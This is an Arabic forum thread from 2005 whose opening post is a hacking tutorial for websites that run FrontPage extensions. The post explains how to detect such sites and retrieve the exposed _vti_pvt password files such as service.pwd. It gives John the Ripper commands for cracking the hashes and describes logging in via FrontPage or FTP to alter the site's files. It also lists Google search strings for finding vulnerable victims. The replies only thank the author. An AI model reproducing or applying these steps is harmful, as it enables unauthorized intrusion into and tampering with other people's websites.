العودة   منتديات الحمادين > المنتديات التقنية > منتدى الكمبيوتر والأنترنت
 

منتدى الكمبيوتر والأنترنت جميع البرامج الجديده وحلول المشاكل تجدها هنا

الإهداءات
ريووووف اليوم 10:00 AM
تسجيل جديد ونشاط اكثر ويكفينا شر العيون وهلا وغلا

ونة خفوق اليوم 06:33 AM
الف شكر خيوو اورنس على اختيااري

لامبارد اليوم 05:02 AM
آووووورنس*** ألف شكر لك على إختياااري أفضل رد*** والتكريم هذاا فخر لي*** وأوعدكم بالمزيد من الإبداااع

حميدانيه كيوووووت اليوم 04:43 AM
اشكرك اورنس على اختياري افضل عضوه************والمنتدى على روسنا ويستاهل اكثر************

شقران اليوم 04:12 AM
الله يجزاك خير يااورنس******** شرف ان اكون شاعر منتدى الحمادين********واهدي التميز لشاعر قناة رواسي ********استاذي ابونادر

آورنس اليوم 03:44 AM
لوحة التميز لهاذا الاسبوع **** افضل عضو ه حميدانيه********افضل كاتب عاشق الريم****افضل رد لامبارد****افضل شاعر شقران********افضل تواجد ونة خفوق ******** الف الف مبروك عليكم ****المراقب العام

جدتهم ومنقدتهم اليوم 02:13 AM
ابونادر الله يسلمك ويجزاك خير على هالتنبيه ,,لنا كم يوم منغثين من هاللغووو

آورنس اليوم 02:12 AM
هلا وغلا بالي جيته تطرب الرووح **************** البـــرنس ******** حياااكـ يا مشرفنا العزيز **** ابرك السعات لحضوورك الميمون ******** واقول لاتعودها لا اجيك هع هع هع **** حمدلله على السلامه

آورنس اليوم 01:06 AM
من نصف القمـر :- كل االشكر للجميع **** على التفااعل **** شقران مشكور **** وبرووق مشكوور **** والى الجميع كل الشكر **** ههههههه شقران صدق المعلومات والا لا هههههههه **** تحيااتي

جدتهم ومنقدتهم يوم أمس 11:55 PM
سبحانك اللهم لا اله الا انت استغفرك واتوب اليك

 

إضافة رد
  #1  
قديم 19-Mar-2005, 05:54 PM
islamm2003 islamm2003 غير متصل
عـضـو جديد
 
تاريخ التسجيل: Mar 2005
العمر: 26
المشاركات: 13
شرح اختراق المواقع التى تدع الفورنت بيج

طرق اختراق المواقع اللتى تدعم Front page



اكثر منا يعلم ان هذه الثغرة خاصة بنظام // NT - Unix

1- وسوف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم Front page أم لا؟

بعدة طرق ولن أذكر إلا الأسهل:

- بالذهاب إلى موقع netcraft
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
وكتابة اسم الموقع وبعد البحث سوف يظهر
mod_frontpage/x
x=(رقم الإصدار الخاص Front page )
- عن طريق إضافة جملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
نضيف الجملة ليصبح بهذه الطريقة
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
وبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج Front page
- وأيضا تستطيع معرفة الموقع يدعم Front page أم لا
بإضافة
vti_cnf_/
بعد عنوان الموقع كهذا المثال:
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
واضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج Front page والإصدارات الخاصة به

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

2-اللحين وعرفنا الموقع يدعم Front page كيف نقدر نوصل لملف الباسوورد؟
بسيطة انت هات الموقع الي يدعم Front page واعلمك
يعني وعلى سبيل المثال
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
يدعم Front page طيب نذهب إلى ملف vti_pvt_
كذا يعني
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
اللحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ؟؟؟

نلاحظ وجود
username : passwd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بـ Front page ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password
وهذا مضمون الملف

ولنفرض اسم المستخدم / ؟؟؟؟؟

والباسوورد / بيكون مشفر *******

الحين وعرفنا كيف نطلع الباسوورد ولاكن بيكون مشفر

مابقى إلا نفك تشفيره
وهذا يتم ببرامج كثير
=(Crack Jack)=
=(John The Ripper)=

راح نستخدم الأفضل والأكثر تداولا وهو
John The Ripper
لتحميل البرنامج من هذا الموقع::
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]


اللحين بعلمك طريقة فك التشفير بالبرنامج

كيف تفك التشفير بهذا البرنامج

أول شي تروح تنقل البرنامج إلى مجلد
\:c
بعدين تفتح مجلد RUN
وتسويلك مستند نصي txt وتسمي الملف passwd

إذهب إلى
ابدأ start
تشغيل run
اكتب الأمر
command
اضغط على Enter وبعدها راح يفتح
إطار الـ DoS
اذهب إلى مجلد RUN
وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر
..cd
حتى توصل
<\:c
بعدين اكتب
cd john
اضغط على Enter
وراح يظهر لك بهذا الشكل
<c:\john
واكتب
cd RUN
وبتدخل المجلد ليصبح بهذه الطريقة
<c:/john/RUN
اللحين نكتب اوامر برنامج John The Ripper
وهي
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
john -i:all passd.txt
--------------------------
يبحث لك عن جميع الأنواع والاحتمالات

=-=-=-=-=-=-=-=-=-=-=-
يبحث عن الأحرف الصغيرة
----------------------------------
john -i:Alpha passwd.txt
=-=-=-=-=-=-=-=-=-=-=-
يبحث عن الارقام
----------------------------------
john -i: Digits passwd.txt
=-=-=-=-=-=-=-=-=-=-=-
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم
---------------------------------
john -i:single passwd.txt
--------------------------------------------------------------------------------
وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل انت فكيت وكسرت الباسوورد ولالا اذهب إلى
john.pot
الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
--------------------------------------------------------------------------------

انت اللحين مستريح عندك username والـ password
وش بقاااالك ؟!!
بقالك تلعب بالموقع لعب

اللحين دخوله بعدة طرق وأحسنها من/


Front page
بعدين
file وتذهب إلى
open web وتضيف
الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك

من FTP
وعليك ببرامج الـ FTP المنتشرة
كالـ ws-ftp
والـ pro ftp
ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

والحين أكيد تبون تجربون على موقع أقولكم روحوا google
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة

وعندك محرك بحث
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
تكتب في محرك البحث
link:service.pwd
أو..
link:adminstrators
وغيرها من الملفات الاحتمال وجود password فيها

تحياااتي لكم

من مواضيعه في الموقع على شكل عشوائي
0 ثغرة اختراق مواقع شوبنج فيزا
0 شرح اختراق المواقع التى تدع الفورنت بيج
0 اخر عشر ثغرات
0 بمناسبة افتتاح المنتدى الجميل دة انا جايب ليكم موضوع جميل جدا
0 ثغرة فى منتديات vb

رد مع اقتباس
  #2  
قديم 20-Mar-2005, 03:17 AM
الصورة الرمزية الدويله
الدويله الدويله غير متصل
[ مـتـمـيـز ]
 
تاريخ التسجيل: Mar 2005
الدولة: حيث ماكنت أكون
العمر: 26
المشاركات: 424
اخوي islamm2003 بارك الله فيك وماقصرت

مجهود تشكر عليه بصراحه

لا شلت يمينك اخي

مواضيعك متميزه دائما كتميز صاحبها

ننتظر المزيد

من مواضيعه في الموقع على شكل عشوائي
0 عبدالرحمن الذي كان اسمه (نجوى)
0 عربجي يعبر عن شعوره
0 مادمت لا تصلي
0 زينب العسكري "اموت بالكويت واريد الزواج من كويتي"
0 الدكتور حاكم بن عبيسان .. في سطور

رد مع اقتباس
  #3  
قديم 20-Mar-2005, 10:03 PM
ولد الديرة A ولد الديرة A غير متصل
عـضـو نشط
 
تاريخ التسجيل: Mar 2005
العمر: 25
المشاركات: 31
مشكور أخوي وماقصرت

على الموضوع

من مواضيعه في الموقع على شكل عشوائي
0 أحم أحم ولد الديرة A وصل
0 صور سيارات رووعه

__________________



معـــــــــا ضــــــــد الأرهـــــــــــاب
رد مع اقتباس
  #4  
قديم 16-Feb-2008, 11:33 PM
alsahir alsahir غير متصل
[ جـديــد ]
 
تاريخ التسجيل: Feb 2008
المشاركات: 1
رد: شرح اختراق المواقع التى تدع الفورنت بيج

مشكووووووووووووووووووووووووووووووور

من مواضيعه في الموقع على شكل عشوائي

رد مع اقتباس
  #5  
قديم 17-Feb-2008, 01:03 AM
الصورة الرمزية غنام العرافه
غنام العرافه غنام العرافه متصل الآن
مشرف قسم الحمادين
 
تاريخ التسجيل: May 2007
الدولة: دار أخوان نوره
المشاركات: 906
رد: شرح اختراق المواقع التى تدع الفورنت بيج

يعطيك الله العافيه وتسلم يمينك تقبل مروري وووودي ودمت ،،،،

من مواضيعه في الموقع على شكل عشوائي
0 ((كلام زي العســــل ))
0 (( أعمال يحبها الله في رمضان لا تفوتكم ...))
0 {{معروف بن حبشان مع الشاعر فهد عافت الشمري}}
0 $(( حقيقة الصلاه ))$
0 (( نية الخيرتسوق للخير ))

__________________
رد مع اقتباس
إضافة رد


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة


الساعة الآن 01:43 PM.


Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd diamond

.:: الذهاب الى أعلى الصفحة ::.
.:: جميع الحقوق محفوظة لكل المسملين رمضان 2008 ::.
.:: الذهاب الى أعلى الصفحة ::.

SEO by bdr130.net 3.0.0